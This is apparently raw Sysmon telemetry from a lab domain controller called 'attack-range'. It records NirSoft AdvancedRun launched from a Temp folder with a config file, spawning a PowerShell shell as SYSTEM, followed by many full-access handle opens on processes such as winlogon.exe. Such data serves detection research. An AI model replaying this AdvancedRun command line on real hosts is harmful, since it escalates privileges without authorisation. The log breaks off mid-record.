18:49:40.138{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004015466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004015460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.377{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c powershell.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004015459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 